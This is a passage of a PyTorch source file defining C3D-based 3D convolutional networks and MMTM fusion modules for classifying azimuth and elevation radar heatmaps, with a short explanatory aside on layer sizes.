Proceedings of the IEEE international conference on computer vision. 2015.
"""
"""
1.C3D with one directional heatmap -> C3D
2.C3D with two directional heatmaps -> C3DFusionBaseline
3.C3D with two directional heatmaps fusion -> C3DFusionV2
4.C3D with multimodal phase attention -> ATT_PHASE
5.MMTM add to C3D multimodal fusion + phase attention
https://github.com/haamoon/mmtm/blob/master/mmtm.py
"""
import math
import torch
import torch.nn as nn
from torchsummary import summary
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Variable
from functools import partial
from FER.em_network.models.Conv2D import PhaseNet
class TimeDistributed(nn.Module):
def __init__(self, module):
super(TimeDistributed, self).__init__()
self.module = module
def forward(self, x):
if len(x.size()) <= 2:
return self.module(x)
n, t = x.size(0), x.size(1)
# merge batch and seq dimensions
x_reshape = x.contiguous().view(n * t, x.size(2), x.size(3), x.size(4))
y = self.module(x_reshape)
# We have to reshape Y
y = y.contiguous().view(n, t, y.size(1), y.size(2), y.size(3))
return y
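As a minimal, self-contained sketch of how the `TimeDistributed` wrapper above is meant to be used (the class is re-declared here as `TimeDistributed2D`, a hypothetical name, so the snippet runs on its own): a 2D module is applied independently to every time step of a `(N, T, C, H, W)` tensor by folding time into the batch axis and unfolding it afterwards.

```python
import torch
import torch.nn as nn


class TimeDistributed2D(nn.Module):
    """Apply a 2D module to every time step of a (N, T, C, H, W) tensor."""

    def __init__(self, module):
        super().__init__()
        self.module = module

    def forward(self, x):
        if x.dim() <= 2:
            return self.module(x)
        n, t = x.size(0), x.size(1)
        # Fold time into the batch axis, run the 2D module, unfold again.
        y = self.module(x.reshape(n * t, *x.shape[2:]))
        return y.reshape(n, t, *y.shape[1:])


frames = torch.randn(2, 5, 3, 8, 8)  # (batch, time, channels, H, W)
wrapped = TimeDistributed2D(nn.Conv2d(3, 4, kernel_size=3, padding=1))
out = wrapped(frames)  # batch and time dims preserved, channels become 4
```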
class TimeDistributedTwin(nn.Module):
def __init__(self, module):
super(TimeDistributedTwin, self).__init__()
self.module = module
def forward(self, x, z):
if len(x.size()) <= 2:
return self.module(x)
xn, xt = x.size(0), x.size(1)
zn, zt = z.size(0), z.size(1)
# merge batch and seq dimensions
x_reshape = x.contiguous().view(xn * xt, x.size(2), x.size(3), x.size(4))
z_reshape = z.contiguous().view(zn * zt, z.size(2), z.size(3), z.size(4))
y, v = self.module(x_reshape, z_reshape)
# We have to reshape Y
y = y.contiguous().view(xn, xt, y.size(1), y.size(2), y.size(3))
v = v.contiguous().view(zn, zt, v.size(1), v.size(2), v.size(3))
return y, v
def init_weights(m):
    # Debug helper carried over from the reference MMTM code: it only prints
    # the module (and its weight for nn.Linear); despite the name, it does
    # not re-initialise any parameters. Its call sites below are commented out.
    print(m)
    if type(m) == nn.Linear:
        print(m.weight)
    else:
        print('error')
class MMTM(nn.Module):
def __init__(self, dim_visual, dim_skeleton, ratio):
super(MMTM, self).__init__()
dim = dim_visual + dim_skeleton
dim_out = int(2 * dim / ratio)
self.fc_squeeze = nn.Linear(dim, dim_out)
self.fc_visual = nn.Linear(dim_out, dim_visual)
self.fc_skeleton = nn.Linear(dim_out, dim_skeleton)
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
# initialize
# with torch.no_grad():
# self.fc_squeeze.apply(init_weights)
# self.fc_visual.apply(init_weights)
# self.fc_skeleton.apply(init_weights)
def forward(self, visual, skeleton):
squeeze_array = []
for tensor in [visual, skeleton]:
tview = tensor.view(tensor.shape[:2] + (-1,))
squeeze_array.append(torch.mean(tview, dim=-1))
squeeze = torch.cat(squeeze_array, 1)
excitation = self.fc_squeeze(squeeze)
excitation = self.relu(excitation)
vis_out = self.fc_visual(excitation)
sk_out = self.fc_skeleton(excitation)
vis_out = self.sigmoid(vis_out)
sk_out = self.sigmoid(sk_out)
dim_diff = len(visual.shape) - len(vis_out.shape)
vis_out = vis_out.view(vis_out.shape + (1,) * dim_diff)
dim_diff = len(skeleton.shape) - len(sk_out.shape)
sk_out = sk_out.view(sk_out.shape + (1,) * dim_diff)
return visual * vis_out, skeleton * sk_out
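As a sanity check on the bottleneck sizing in `MMTM.__init__` above, the pure-Python helper below (`mmtm_dims` is a hypothetical name for illustration) mirrors the `dim_out = int(2 * dim / ratio)` squeeze formula: the two modality channel counts are summed, then compressed by the ratio before the per-modality excitation layers expand back out.

```python
def mmtm_dims(dim_visual, dim_skeleton, ratio):
    """Mirror MMTM's bottleneck sizing: squeeze to int(2 * dim / ratio)."""
    dim = dim_visual + dim_skeleton
    dim_out = int(2 * dim / ratio)
    return dim, dim_out
```

For the `MMTM(64, 64, 4)` blocks used later in this file, the squeeze layer therefore maps 128 concatenated channel means down to 64 hidden units.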
class C3D(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3D, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
# self.group4 = nn.Sequential(
# nn.Conv3d(64, 256, kernel_size=(3, 7, 3), padding=1),
# nn.BatchNorm3d(256),
# nn.ReLU(),
# nn.Conv3d(256, 256, kernel_size=(3, 7, 3), padding=1),
# nn.BatchNorm3d(256),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
last_duration = int(math.floor(sample_duration / 8))
# last_size = int(math.ceil(sample_size / 32))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
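The hard-coded `last_duration = floor(sample_duration / 8)` in `C3D.__init__` relies on the three temporal stride-2 pools (groups 2-4; group 1 pools with temporal stride 1, and every conv uses kernel 3 with padding 1, which preserves length). The exact match only holds for some durations (e.g. 32); the sketch below traces the temporal axis with the standard one-axis output-length formula (`out_len` is an illustrative helper name):

```python
def out_len(n, kernel, stride, pad=0):
    # One-axis output length for nn.Conv3d / nn.MaxPool3d (dilation 1).
    return (n + 2 * pad - kernel) // stride + 1


# Temporal axis through the four pooling stages of C3D for T = 32:
t = 32
t = out_len(t, kernel=2, stride=1)  # group1 pool: 32 -> 31
t = out_len(t, kernel=2, stride=2)  # group2 pool: 31 -> 15
t = out_len(t, kernel=2, stride=2)  # group3 pool: 15 -> 7
t = out_len(t, kernel=1, stride=2)  # group4 pool: 7 -> 4
```

Here `t` ends at 4, which equals `floor(32 / 8)`, so the flattened feature size fed to `fc1` is consistent for a 32-frame clip.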
class SubNet(nn.Module):
def __init__(self):
super(SubNet, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class SubNet_v4(nn.Module):
def __init__(self):
super(SubNet_v4, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 1), padding=(0, 0, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
# SubNet_v2: variant sized for larger input heatmaps (91, 50)
class SubNet_v2(nn.Module):
def __init__(self):
super(SubNet_v2, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class SubNet_v3(nn.Module):
def __init__(self):
super(SubNet_v3, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 1, 1)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class C3DFusionBaseline(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
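In `C3DFusionBaseline`, `torch.cat((out_azi, out_ele), dim=1)` stacks the two 64-channel `SubNet` outputs into 128 channels, which is why `fc1` takes `128 * last_duration * last_size_h * last_size_w` inputs. The arithmetic can be checked with a small helper (`fused_flat_features` is a hypothetical name, assuming the stream/channel counts above):

```python
def fused_flat_features(ch_per_stream, streams, t, h, w):
    # Channels concatenate along dim=1 (2 * 64 = 128), then everything
    # except the batch axis is flattened before the first linear layer.
    return streams * ch_per_stream * t * h * w
```

With `last_duration = 4` and the hard-coded 2x2 spatial size, `fc1` expects 2048 input features per sample.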
class C3DFusionBaseline_small(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline_small, self).__init__()
self.net_azimuth = SubNet_v4()
self.net_elevation = SubNet_v4()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 1
self.fc1 = nn.Sequential(
nn.Linear((128 * 2 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionBaselineFull(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaselineFull, self).__init__()
self.net_azimuth = SubNet_v2()
self.net_elevation = SubNet_v2()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionBaseline_out(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline_out, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out1 = torch.cat((out_azi, out_ele), dim=1)
out = out1.view(out1.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out1, out
class C3DMMTM_v1(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DMMTM_v1, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
self.mmtm = TimeDistributedTwin(MMTM(64, 64, 4))
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# MMTM fusion
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DMMTM_v2(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DMMTM_v2, self).__init__()
self.azi_group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.azi_group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.azi_group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.azi_group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
self.ele_group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.ele_group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.ele_group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.ele_group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
self.mmtm1 = TimeDistributedTwin(MMTM(16, 16, 4))
self.mmtm2 = TimeDistributedTwin(MMTM(32, 32, 4))
self.mmtm3 = TimeDistributedTwin(MMTM(64, 64, 4))
self.mmtm4 = TimeDistributedTwin(MMTM(64, 64, 4))
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
# group 1
out_azi = self.azi_group1(azi)
out_ele = self.ele_group1(ele)
# MMTM fusion1
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm1(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 2
out_azi = self.azi_group2(out_azi)
out_ele = self.ele_group2(out_ele)
# MMTM fusion2
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm2(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 3
out_azi = self.azi_group3(out_azi)
out_ele = self.ele_group3(out_ele)
# MMTM fusion3
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm3(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 4
out_azi = self.azi_group4(out_azi)
out_ele = self.ele_group4(out_ele)
# MMTM fusion4
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm4(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
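As a side note (this helper is an illustration added here, not part of the model code, and its name is ours): the `fc1` layer above expects `128 * last_duration * 2 * 2` input features, where `last_duration = floor(sample_duration / 8)` and the 128 comes from concatenating the two 64-channel streams. A minimal sketch of that arithmetic:

```python
import math

def mmtm_fc1_in_features(sample_duration, channels=128, h=2, w=2):
    """Flattened feature width fed into fc1 (hypothetical helper name)."""
    last_duration = int(math.floor(sample_duration / 8))
    return channels * last_duration * h * w

print(mmtm_fc1_in_features(100))
```

For the `sample_duration=100` used in the `__main__` smoke test below, this gives 128 * 12 * 2 * 2 = 6144 input features.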
# C3DAttention below is the older late-fusion variant, kept for reference.
class C3DAttention(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DAttention, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionV2(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionV2, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc_azi = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Sigmoid(),  # note: ReLU before Sigmoid limits outputs to [0.5, 1); fc_ele below repeats the pattern
)
self.fc_ele = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Sigmoid())
self.fc1 = nn.Sequential(
nn.Linear(1024 * 2, 1024),
nn.ReLU())
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU())
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# azi
out_azi = out_azi.view(out_azi.size(0), -1)
out_azi = self.fc_azi(out_azi)
# ele
out_ele = out_ele.view(out_ele.size(0), -1)
out_ele = self.fc_ele(out_ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
# out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class ATT_PHASE(nn.Module):
    def __init__(self):
        super(ATT_PHASE, self).__init__()
        self.conv1 = TimeDistributed(nn.Sequential(
            nn.Conv2d(1, 4, kernel_size=(5, 3), stride=(1, 1), padding=1),
            nn.BatchNorm2d(4),
            nn.ReLU()))
        self.max1 = TimeDistributed(nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2), padding=(1, 1)))
        self.conv2 = TimeDistributed(nn.Sequential(
            nn.Conv2d(4, 8, kernel_size=(3, 3), padding=(0, 1)),
            nn.BatchNorm2d(8),
            nn.ReLU()))
        self.max2 = TimeDistributed(nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2), padding=(0, 0)))
        self.pool = nn.MaxPool3d(kernel_size=(8, 1, 1), stride=(1, 1, 1))

    def forward(self, x):
        out = self.conv1(x)   # (n, 4, 10, 5) per frame
        out = self.max1(out)  # (n, 4, 5, 3)
        out = self.conv2(out)  # (n, 8, 3, 3); conv2 outputs 8 channels
        out = self.max2(out)
        out = self.pool(out)
        out = out.view(out.size(0), out.size(1))
        return out
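The per-frame shape comments in `ATT_PHASE.forward` can be sanity-checked with the standard conv/pool output-size formula, `out = floor((in + 2*pad - kernel) / stride) + 1`. A small self-contained sketch (the helper name is ours, not the library's):

```python
def conv_out(size, kernel, stride=1, pad=0):
    """Output length of a conv/pool along one spatial dimension."""
    return (size + 2 * pad - kernel) // stride + 1

# max1 uses kernel 3, stride 2, pad 1: it maps height 10 -> 5 and width 5 -> 3,
# which matches the "(n, 4, 5, 3)" comment in the forward pass.
print(conv_out(10, 3, stride=2, pad=1), conv_out(5, 3, stride=2, pad=1))
```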
class C3D_VIDEO_V2(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_V2, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 16, kernel_size=3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=0),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 2
last_size = 5
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
features = self.group4(out)  # intermediate conv features, returned alongside the class scores
# out = self.group5(out)
out = features.view(features.size(0), -1)
out = self.fc1(out)
